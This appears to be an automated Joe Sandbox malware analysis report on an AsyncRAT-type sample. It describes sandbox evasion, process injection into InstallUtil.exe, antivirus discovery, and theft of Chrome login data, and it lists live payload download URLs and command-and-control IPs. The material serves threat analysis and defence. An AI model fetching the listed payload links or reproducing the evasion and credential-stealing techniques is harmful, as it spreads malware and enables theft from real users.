                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AsyncRATShow sources
                      Source: Yara matchFile source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.aQKifdER74.exe.2c8fe7e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.aQKifdER74.exe.2c95a48.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.aQKifdER74.exe.2c95a48.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.702390271.0000000002C8E000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.883519975.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.884667600.0000000002E41000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.702559639.0000000002DCB000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: aQKifdER74.exe PID: 1172, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6432, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: aQKifdER74.exe, 00000000.00000002.702390271.0000000002C8E000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.883519975.0000000000402000.00000040.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\aQKifdER74.exe TID: 3740Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exe TID: 6624Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3120Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5128Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\aQKifdER74.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 9307Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 404Jump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\tmpC472.tmp.batJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                      Source: aQKifdER74.exe, 00000000.00000002.705051355.0000000012CC1000.00000004.00000001.sdmpBinary or memory string: e48cvMCi6f
                      Source: InstallUtil.exe, 00000005.00000002.883519975.0000000000402000.00000040.00000001.sdmpBinary or memory string: vmware
                      Source: InstallUtil.exe, 00000005.00000003.845626397.00000000051C0000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: aQKifdER74.exe, 00000000.00000002.702113315.0000000000E6B000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\aQKifdER74.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Writes to foreign memory regionsShow sources
                      Source: C:\Users\user\Desktop\aQKifdER74.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 40E000Jump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 410000Jump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: B02008Jump to behavior
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\Desktop\aQKifdER74.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\tmpC472.tmp.bat''Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 3 Jump to behavior
                      Source: InstallUtil.exe, 00000005.00000003.782383035.00000000051C0000.00000004.00000001.sdmpBinary or memory string: Program Managerwid
                      Source: C:\Users\user\Desktop\aQKifdER74.exeQueries volume information: C:\Users\user\Desktop\aQKifdER74.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\aQKifdER74.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Lowering of HIPS / PFW / Operating System Security Settings:

                      barindex
                      Yara detected AsyncRATShow sources
                      Source: Yara matchFile source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.aQKifdER74.exe.2c8fe7e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.aQKifdER74.exe.2c95a48.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.aQKifdER74.exe.2c95a48.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.702390271.0000000002C8E000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.883519975.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.884667600.0000000002E41000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.702559639.0000000002DCB000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: aQKifdER74.exe PID: 1172, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6432, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                      Stealing of Sensitive Information:

                      barindex
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation1DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools1OS Credential Dumping1File and Directory Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScripting1Scheduled Task/Job1Process Injection212Scripting1LSASS MemorySystem Information Discovery13Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsScheduled Task/Job1Logon Script (Windows)Scheduled Task/Job1Obfuscated Files or Information111Security Account ManagerQuery Registry1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing11NTDSSecurity Software Discovery111Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsProcess Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol13Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading1Cached Domain CredentialsVirtualization/Sandbox Evasion21VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsModify Registry1DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion21Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection212/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      aQKifdER74.exe23%MetadefenderBrowse
                      aQKifdER74.exe54%ReversingLabsByteCode-MSIL.Backdoor.Crysan
                      aQKifdER74.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      5.2.InstallUtil.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File
                      0.2.aQKifdER74.exe.2c95a48.1.unpack100%AviraHEUR/AGEN.1110362Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://cdn.discordapp.comx0%Avira URL Cloudsafe
                      http://5.230.68.1540%Avira URL Cloudsafe
                      http://5.230.68.154/img/icon/b.exe100%Avira URL Cloudmalware
                      http://james.newtonking.com/projects/json0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      cdn.discordapp.com
                      		162.159.133.233
                      		truefalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://cdn.discordapp.com/attachments/889935662827044904/889981640498090054/runpe.pdffalse
                          		high
                          http://5.230.68.154/img/icon/b.exetrue
                          • Avira URL Cloud: malware
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://system.data.sqlite.org/XInstallUtil.exe, 00000005.00000002.889863882.0000000007340000.00000004.00020000.sdmpfalse
                            		high
                            https://www.newtonsoft.com/jsonInstallUtil.exe, 00000005.00000002.889728898.0000000007170000.00000004.00020000.sdmpfalse
                              		high
                              https://cdn.discordapp.comxaQKifdER74.exe, 00000000.00000002.702390271.0000000002C8E000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.nuget.org/packages/Newtonsoft.Json.BsonInstallUtil.exe, 00000005.00000002.889728898.0000000007170000.00000004.00020000.sdmpfalse
                                		high
                                http://5.230.68.154aQKifdER74.exe, 00000000.00000002.702363399.0000000002C51000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://system.data.sqlite.org/InstallUtil.exe, 00000005.00000002.889863882.0000000007340000.00000004.00020000.sdmpfalse
                                  		high
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameaQKifdER74.exe, 00000000.00000002.702363399.0000000002C51000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.884667600.0000000002E41000.00000004.00000001.sdmpfalse
                                    		high
                                    http://james.newtonking.com/projects/jsonInstallUtil.exe, 00000005.00000002.889728898.0000000007170000.00000004.00020000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://www.newtonsoft.com/jsonschemaInstallUtil.exe, 00000005.00000002.889728898.0000000007170000.00000004.00020000.sdmpfalse
                                      		high

                                      Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public

                                      IPDomainCountryFlagASNASN NameMalicious
                                      5.230.84.50
                                      		unknownGermany
                                      		12586ASGHOSTNETDEtrue
                                      5.230.68.154
                                      		unknownGermany
                                      		12586ASGHOSTNETDEtrue
                                      162.159.133.233
                                      		cdn.discordapp.comUnited States
                                      		13335CLOUDFLARENETUSfalse

                                      Private

                                      IP
                                      192.168.2.1

                                      General Information

                                      Joe Sandbox Version:33.0.0 White Diamond
                                      Analysis ID:491717
                                      Start date:27.09.2021
                                      Start time:20:35:12
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 8m 8s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Sample file name:aQKifdER74.exe
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                      Number of analysed new started processes analysed:21
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.evad.winEXE@10/6@1/4
                                      EGA Information:Failed
                                      HDC Information:Failed
                                      HCA Information:
                                      • Successful, ratio: 75%
                                      • Number of executed functions: 60
                                      • Number of non-executed functions: 3
                                      Cookbook Comments:
                                      • Adjust boot time
                                      • Enable AMSI
                                      • Found application associated with file extension: .exe
                                      Warnings:
                                      Show All
                                      • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                      • Excluded IPs from analysis (whitelisted): 13.107.5.88, 13.107.42.16, 2.22.152.11, 2.20.86.117, 23.0.174.185, 23.0.174.200, 20.50.102.62, 67.26.137.254, 8.253.95.120, 67.26.75.254, 8.241.11.126, 67.27.158.126, 20.82.209.183, 23.10.249.43, 23.10.249.26, 20.54.110.249, 40.112.88.60
                                      • Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, fg.download.windowsupdate.com.c.footprint.net, client-office365-tas.msedge.net, ocos-office365-s2s.msedge.net, config.edge.skype.com.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, e-0009.e-msedge.net, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, storeedgefd.xbetservices.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, config-edge-skype.l-0007.l-msedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, l-0007.l-msedge.net, config.edge.skype.com, storeedgefd.dsx.mp.microsoft.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, afdo-tas-offload.trafficmanager.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, storeedgefd.dsx.mp.microsoft.com.edgekey.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, download.windowsupdate.com.edgesuite.net, ocos-office365-s2s-msedge-net.e-0009.e-msedge.net, ris.api.iris.microsoft.com, l-0007.config.skype.com, store-images.s-microsoft.com, e16646.dscg.akamaiedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • VT rate limit hit for: /opt/package/joesandbox/database/analysis/491717/sample/aQKifdER74.exe

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      20:36:16API Interceptor2x Sleep call for process: aQKifdER74.exe modified
                                      20:36:32API Interceptor2x Sleep call for process: InstallUtil.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      5.230.84.50uYXdiSR2Vh.exeGet hashmaliciousBrowse
                                        162.159.133.233update[1].exeGet hashmaliciousBrowse
                                        • cdn.discordapp.com/attachments/870656611562180611/873962758427783228/4401fbad77d12fbc.dll
                                        trinitymediaorder-po140521.docGet hashmaliciousBrowse
                                        • cdn.discordapp.com/attachments/843047034843955224/843047170223243314/NioR5xJ1XC9a9v2.exe
                                        NeworderWJO-002,pdf.exeGet hashmaliciousBrowse
                                        • cdn.discordapp.com/attachments/841906355832750103/842664739850944512/zBdd3DFJml9UrbJ.exe
                                        proforma invoice No. 42037,pdf.exeGet hashmaliciousBrowse
                                        • cdn.discordapp.com/attachments/809311531652087809/839379299009298442/Log_snake.exe
                                        Proforma adjunta N#U00ba 42037,pdf.exeGet hashmaliciousBrowse
                                        • cdn.discordapp.com/attachments/809311531652087809/839093777200971776/snake_crypted.exe
                                        Bon_Commande.BC106823.1602202.docGet hashmaliciousBrowse
                                        • cdn.discordapp.com/attachments/801091101888741379/818969220003790912/fodx.exe
                                        PO81105083.xlsxGet hashmaliciousBrowse
                                        • cdn.discordapp.com/attachments/801449801975726095/801450821929009152/Purchase_Order.exe
                                        Final documents.docGet hashmaliciousBrowse
                                        • cdn.discordapp.com/attachments/788973775433498687/788974151649722398/damianox.scr
                                        009845673.docGet hashmaliciousBrowse
                                        • cdn.discordapp.com/attachments/788973775433498687/788974151649722398/damianox.scr
                                        bPT6aeEo8O.rtfGet hashmaliciousBrowse
                                        • cdn.discordapp.com/attachments/785404703725977620/785404954315194398/buildkelly.exe
                                        00094321 Order.docGet hashmaliciousBrowse
                                        • cdn.discordapp.com/attachments/783666652440428545/783667553490698250/kdot.exe

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        cdn.discordapp.coms9SWgUgyO5.exeGet hashmaliciousBrowse
                                        • 162.159.133.233
                                        Original Shipping documents.exeGet hashmaliciousBrowse
                                        • 162.159.129.233
                                        Image-Scan-80195056703950029289.exeGet hashmaliciousBrowse
                                        • 162.159.133.233
                                        RHgAncmh0E.exeGet hashmaliciousBrowse
                                        • 162.159.135.233
                                        InvPixcareer.-43329_20210927.xlsbGet hashmaliciousBrowse
                                        • 162.159.129.233
                                        InvPixcareer.-43329_20210927.xlsbGet hashmaliciousBrowse
                                        • 162.159.130.233
                                        7kDS0NWm3l.exeGet hashmaliciousBrowse
                                        • 162.159.130.233
                                        kzSWxYLY4H.exeGet hashmaliciousBrowse
                                        • 162.159.133.233
                                        InvPixcareer.-5589234_20210927.xlsbGet hashmaliciousBrowse
                                        • 162.159.133.233
                                        INQUIRY LIST.exeGet hashmaliciousBrowse
                                        • 162.159.129.233
                                        YTHK21082400.exeGet hashmaliciousBrowse
                                        • 162.159.133.233
                                        Silver_Light_Group_DOC03027321122.exeGet hashmaliciousBrowse
                                        • 162.159.130.233
                                        DeKxL6OdiV.exeGet hashmaliciousBrowse
                                        • 162.159.130.233
                                        OTKqvzSZfm.exeGet hashmaliciousBrowse
                                        • 162.159.133.233
                                        Taskmgr.exeGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        SWIFT ADVISE VD20092021.Pdf.exeGet hashmaliciousBrowse
                                        • 162.159.129.233
                                        xccHIJ0vo7.exeGet hashmaliciousBrowse
                                        • 162.159.133.233
                                        9Fq3K0VfLK.exeGet hashmaliciousBrowse
                                        • 162.159.134.233
                                        NEW PRODUCT DETAILS.docGet hashmaliciousBrowse
                                        • 162.159.129.233
                                        PO-IMAGE-SCAN-00HD878HE485HDYTE.exeGet hashmaliciousBrowse
                                        • 162.159.129.233

                                        ASN

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        ASGHOSTNETDEuYXdiSR2Vh.exeGet hashmaliciousBrowse
                                        • 5.230.84.50
                                        9YBEjmPn3wGet hashmaliciousBrowse
                                        • 89.106.93.135
                                        jKira.x86Get hashmaliciousBrowse
                                        • 5.175.194.119
                                        EofbDJ3S2o.exeGet hashmaliciousBrowse
                                        • 5.230.68.37
                                        qKxXZuMvtPGet hashmaliciousBrowse
                                        • 193.187.23.215
                                        4rnjlRe7UG.exeGet hashmaliciousBrowse
                                        • 5.230.68.37
                                        8ft2Xvqgx2.exeGet hashmaliciousBrowse
                                        • 5.230.68.37
                                        WJRyvbvOD7.exeGet hashmaliciousBrowse
                                        • 5.230.68.37
                                        o06RIULPrN.exeGet hashmaliciousBrowse
                                        • 5.230.68.37
                                        wpljwjYfor.exeGet hashmaliciousBrowse
                                        • 5.230.68.37
                                        jNqtcYPpUY.exeGet hashmaliciousBrowse
                                        • 5.230.68.37
                                        VPSs4oyVHT.exeGet hashmaliciousBrowse
                                        • 5.230.68.37
                                        VPSs4oyVHT.exeGet hashmaliciousBrowse
                                        • 5.230.68.37
                                        RaIizmp3oX.exeGet hashmaliciousBrowse
                                        • 5.230.68.37
                                        RaIizmp3oX.exeGet hashmaliciousBrowse
                                        • 5.230.68.37
                                        setup_x86_x64_install.exeGet hashmaliciousBrowse
                                        • 5.230.68.37
                                        6Wn3W5gOWd.exeGet hashmaliciousBrowse
                                        • 5.230.67.97
                                        OrTzQl1ZBa.exeGet hashmaliciousBrowse
                                        • 5.230.67.97
                                        kWhElUg959.exeGet hashmaliciousBrowse
                                        • 5.230.67.97
                                        07985C9819097683B7F2BC59CC7D02E0497F012187E05.exeGet hashmaliciousBrowse
                                        • 5.230.69.213
                                        ASGHOSTNETDEuYXdiSR2Vh.exeGet hashmaliciousBrowse
                                        • 5.230.84.50
                                        9YBEjmPn3wGet hashmaliciousBrowse
                                        • 89.106.93.135
                                        jKira.x86Get hashmaliciousBrowse
                                        • 5.175.194.119
                                        EofbDJ3S2o.exeGet hashmaliciousBrowse
                                        • 5.230.68.37
                                        qKxXZuMvtPGet hashmaliciousBrowse
                                        • 193.187.23.215
                                        4rnjlRe7UG.exeGet hashmaliciousBrowse
                                        • 5.230.68.37
